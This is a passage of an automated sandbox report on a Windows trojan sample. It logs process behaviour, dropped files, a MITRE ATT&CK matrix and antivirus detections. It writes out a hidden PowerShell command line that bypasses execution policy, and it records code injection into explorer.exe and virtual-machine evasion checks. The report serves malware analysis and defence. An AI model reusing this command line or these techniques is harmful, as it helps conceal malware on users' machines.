                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4655Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5226Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 879Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4886
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4910
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\WindowsApps\winApps.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\spoxiyrj.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iczy5vwk.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5044Thread sleep count: 4886 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5044Thread sleep count: 4910 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7160Thread sleep time: -15679732462653109s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: explorer.exe, 0000000B.00000000.2164458233.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
                      Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                      Source: explorer.exe, 0000000B.00000002.3343227530.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
                      Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                      Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                      Source: explorer.exe, 0000000B.00000002.3343227530.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
                      Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000000B.00000003.3097682652.000000000354B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                      Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: explorer.exe, 0000000B.00000003.3097682652.000000000354B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
                      Source: explorer.exe, 0000000B.00000000.2162912358.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
                      Source: explorer.exe, 0000000B.00000000.2164458233.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
                      Source: explorer.exe, 0000000B.00000003.3094867488.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 0000000B.00000003.3097682652.000000000354B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
                      Source: explorer.exe, 0000000B.00000003.3097682652.000000000354B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
                      Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
                      Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
                      Source: explorer.exe, 0000000B.00000000.2162912358.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: explorer.exe, 0000000B.00000002.3343227530.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000000B.00000002.3340185941.0000000007699000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\explorer.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Bypasses PowerShell execution policy
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 10630000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: unknown EIP: 29EB0000
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 1028 base: 10630000 value: 48Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 1028 base: 29EB0000 value: 48
                      Writes to foreign memory regions
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 10630000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 29EB0000
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC35E.tmp" "c:\Users\user\AppData\Local\Temp\CSCD0EB64BB52C94309A29EE6B778E205.TMP"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\spoxiyrj.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDA71.tmp" "c:\Users\user\AppData\Local\Temp\CSC30DB8E40DC954A908A17CE354256952F.TMP"Jump to behavior
                      Source: explorer.exe, 0000000B.00000002.3343227530.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3096126515.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
                      Source: explorer.exe, 0000000B.00000000.2163273317.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3336566903.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                      Source: explorer.exe, 0000000B.00000002.3339851443.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2163273317.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3336566903.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 0000000B.00000000.2163273317.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3336566903.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 0000000B.00000000.2163273317.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3336566903.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 0000000B.00000000.2162912358.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3335335583.0000000000EF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeCode function: 0_2_00007FF77ACEC9EC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF77ACEC9EC
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting                      		Valid Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		312
                      Process Injection                      		1
                      Masquerading                      		OS Credential Dumping1
                      System Time Discovery                      		Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution                      		111
                      Scripting                      		1
                      Scheduled Task/Job                      		1
                      Disable or Modify Tools                      		LSASS Memory111
                      Security Software Discovery                      		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts3
                      PowerShell                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		31
                      Virtualization/Sandbox Evasion                      		Security Account Manager2
                      Process Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                      Process Injection                      		NTDS31
                      Virtualization/Sandbox Evasion                      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets1
                      Application Window Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
                      File and Directory Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync13
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1543709 Sample: SecuriteInfo.com.Win64.Malw... Startdate: 28/10/2024 Architecture: WINDOWS Score: 100 57 Antivirus detection for dropped file 2->57 59 Antivirus / Scanner detection for submitted sample 2->59 61 Multi AV Scanner detection for dropped file 2->61 63 5 other signatures 2->63 8 wscript.exe 1 2->8         started        11 wscript.exe 2->11         started        13 SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe 4 2->13         started        process3 file4 65 Suspicious powershell command line found 8->65 67 Wscript starts Powershell (via cmd or directly) 8->67 69 Bypasses PowerShell execution policy 8->69 71 2 other signatures 8->71 16 powershell.exe 21 8->16         started        20 powershell.exe 11->20         started        45 C:\Users\user\AppData\Local\...\winApps.dll, PE32+ 13->45 dropped 47 C:\Users\user\AppData\Local\...\app.vbs, ASCII 13->47 dropped 49 C:\Users\user\AppData\Local\...\app.ps1, ASCII 13->49 dropped 22 WerFault.exe 19 16 13->22         started        signatures5 process6 file7 39 C:\Users\user\AppData\...\iczy5vwk.cmdline, Unicode 16->39 dropped 51 Injects code into the Windows Explorer (explorer.exe) 16->51 53 Writes to foreign memory regions 16->53 55 Creates a thread in another existing process (thread injection) 16->55 24 csc.exe 3 16->24         started        27 explorer.exe 65 2 16->27 injected 29 conhost.exe 16->29         started        31 csc.exe 3 20->31         started        33 conhost.exe 20->33         started        signatures8 process9 file10 41 C:\Users\user\AppData\Local\...\iczy5vwk.dll, PE32 24->41 dropped 35 cvtres.exe 1 24->35         started        43 C:\Users\user\AppData\Local\...\spoxiyrj.dll, PE32 31->43 dropped 37 cvtres.exe 1 31->37         started        process11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe47%ReversingLabsWin64.Trojan.Generic
                      SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe100%AviraTR/Agent.ktefj

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\WindowsApps\winApps.dll100%AviraTR/Agent.btqep
                      C:\Users\user\AppData\Local\Microsoft\WindowsApps\winApps.dll50%ReversingLabsWin64.Trojan.Generic

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

